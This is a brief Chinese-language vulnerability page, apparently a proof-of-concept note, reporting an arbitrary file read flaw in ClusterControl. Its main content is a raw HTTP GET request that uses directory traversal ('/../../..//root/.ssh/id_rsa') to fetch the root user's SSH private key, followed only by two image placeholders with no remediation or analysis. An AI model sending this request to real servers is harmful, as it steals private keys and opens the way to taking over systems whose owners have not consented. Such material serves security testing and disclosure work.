跳到主要内容

ClusterControl存在任意文件读取漏洞

poc

GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host:
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4

image.png

image.png